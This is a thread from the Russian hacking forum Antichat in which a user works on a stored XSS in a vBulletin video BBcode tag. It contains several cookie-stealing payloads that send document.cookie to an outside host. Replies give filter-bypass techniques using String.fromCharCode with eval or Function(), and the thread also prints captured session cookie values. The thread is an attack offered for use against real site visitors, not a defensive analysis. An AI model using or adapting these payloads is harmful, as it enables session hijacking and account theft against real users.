ANTICHAT
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Снова JS и кавычки (https://forum.antichat.xyz/showthread.php?t=406023)

Seller Zeus 10.02.2014 14:56
Добрый день всем. Такой вопрос.

Есть xss на булке из за тега google*video.

[google*video][U*RL=/onmouseover=document.location.href = 'http://site.net/snf/s.gif?'+document.cookie;a="]1[/U*RL]123[/google*video]

Алерт с куками вылетает на ура, теперь вопрос.

Фильтруются кавычки ' " и `

Как быть в данной ситуации?

XAMEHA 10.02.2014 15:10
А в чем проблема?

Код:
eval(String.fromCharCode(84, 69, 83, 84))

// Фильтр на eval:

Function(String.fromCharCode(84, 69, 83, 84))()

Seller Zeus 10.02.2014 15:55
Спасибо, а как с тегом прописать ? я что то не догоняю

Seller Zeus 10.02.2014 18:00
Дайте encoder Хотябы(

Inoms 10.02.2014 19:05
Цитата:
Сообщение от Seller Zeus
Seller Zeus said:
Дайте encoder Хотябы(
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/

Seller Zeus 10.02.2014 19:31
Цитата:
Сообщение от Inoms
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
Спасибо большое

Seller Zeus 10.02.2014 20:14
Чет не получается.

Зашифровал это место:

Цитата:
Сообщение от None
document.location.href = 'http://site.net/snf/s.gif?'+document.cookie
Получилось:

Цитата:
Сообщение от None
eval(String.fromCharCode(102,117,110,99,116,105,11 1,110,32,101,110,99,111,100,101,95,116,111,95,106, 97,118,97,115,99,114,105,112,116,40,41,32,123,32,1 18,97,114,32,105,110,112,117,116,32,61,32,100,111, 99,117,109,101,110,116,46,103,101,116,69,108,101,1 09,101,110,116,66,121,73,100,40,39,105,110,112,117 ,116,116,101,120,116,39,41,46,118,97,108,117,101,5 9,32,118,97,114,32,111,117,116,112,117,116,32,61,3 2,39,101,118,97,108,40,83,116,114,105,110,103,46,1 02,114,111,109,67,104,97,114,67,111,100,101,40,39, 59,32,102,111,114,40,112,111,115,32,61,32,48,59,32 ,112,111,115,32,60,32,105,110,112,117,116,46,108,1 01,110,103,116,104,59,32,112,111,115,43,43,41,32,1 23,32,111,117,116,112,117,116,32,43,61,32,105,110, 112,117,116,46,99,104,97,114,67,111,100,101,65,116 ,40,112,111,115,41,59,32,105,102,40,112,111,115,32 ,33,61,32,40,105,110,112,117,116,46,108,101,110,10 3,116,104,32,45,32,49,41,41,32,123,32,111,117,116, 112,117,116,32,43,61,32,34,44,34,59,32,125,32,125, 32,111,117,116,112,117,116,32,43,61,32,39,41,41,39 ,59,32,100,111,99,117,109,101,110,116,46,103,101,1 16,69,108,101,109,101,110,116,66,121,73,100,40,39, 114,101,115,117,108,116,39,41,46,105,110,110,101,1 14,72,84,77,76,32,61,32,111,117,116,112,117,116,59 ,32,114,101,116,117,114,110,32,48,59,32,125))
Вставил:

Цитата:
Сообщение от None
[google*video][U*RL=/onmouseover=eval(String.fromCharCode(102,117,110,9 9,116,105,111,110,32,101,110,99,111,100,101,95,116 ,111,95,106,97,118,97,115,99,114,105,112,116,40,41 ,32,123,32,118,97,114,32,105,110,112,117,116,32,61 ,32,100,111,99,117,109,101,110,116,46,103,101,116, 69,108,101,109,101,110,116,66,121,73,100,40,39,105 ,110,112,117,116,116,101,120,116,39,41,46,118,97,1 08,117,101,59,32,118,97,114,32,111,117,116,112,117 ,116,32,61,32,39,101,118,97,108,40,83,116,114,105, 110,103,46,102,114,111,109,67,104,97,114,67,111,10 0,101,40,39,59,32,102,111,114,40,112,111,115,32,61 ,32,48,59,32,112,111,115,32,60,32,105,110,112,117, 116,46,108,101,110,103,116,104,59,32,112,111,115,4 3,43,41,32,123,32,111,117,116,112,117,116,32,43,61 ,32,105,110,112,117,116,46,99,104,97,114,67,111,10 0,101,65,116,40,112,111,115,41,59,32,105,102,40,11 2,111,115,32,33,61,32,40,105,110,112,117,116,46,10 8,101,110,103,116,104,32,45,32,49,41,41,32,123,32, 111,117,116,112,117,116,32,43,61,32,34,44,34,59,32 ,125,32,125,32,111,117,116,112,117,116,32,43,61,32 ,39,41,41,39,59,32,100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,66,121,7 3,100,40,39,114,101,115,117,108,116,39,41,46,105,1 10,110,101,114,72,84,77,76,32,61,32,111,117,116,11 2,117,116,59,32,114,101,116,117,114,110,32,48,59,3 2,125));a="]1[/U*RL]123[/goole*video]
Но не работает, почему?

Подскажите плиз

Seller Zeus 11.02.2014 11:53
Где я ошибся?

Seller Zeus 11.02.2014 14:13
Такой код:

Цитата:
Сообщение от None
[g*ooglevideo][UR*L=/onmouseover=String.fromCharCode(105,109,103,61,110 ,101,119,32,73,109,97,103,101,40,41,59,105,109,103 ,46,115,114,99,61,39,104,116,116,112,58,47,47,107, 114,105,114,109,105,110,97,108,97,46,110,101,116,4 7,115,110,102,47,115,46,103,105,102,63,39)+documen t.cookie;a="]1[/UR*L]123[/g*ooglevideo]
Открывает пустую страницу с таким содержимым:

Цитата:
Сообщение от None
img=new Image();img.src='http://site.net/snf/s.gif?'ibPAcookiecheck=yesss; bblastvisit=1391747746; bblastactivity=0; bbforum_view=f6e2fa0437c99cf04b4bc96c8e0bd82378a10 a68a-1-%7Bi-13_i-1392013111_%7D
Как надо написать правильно чтобы он все же создавал картинку?

Img запишнул в str так как пробелы тоже не допускаются, а переменная создается только с пробелом.

psihoz26 11.02.2014 16:51
попробуй кормить скрипту ссылку на js файл в котором и будет нужный код


Время: 08:58
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице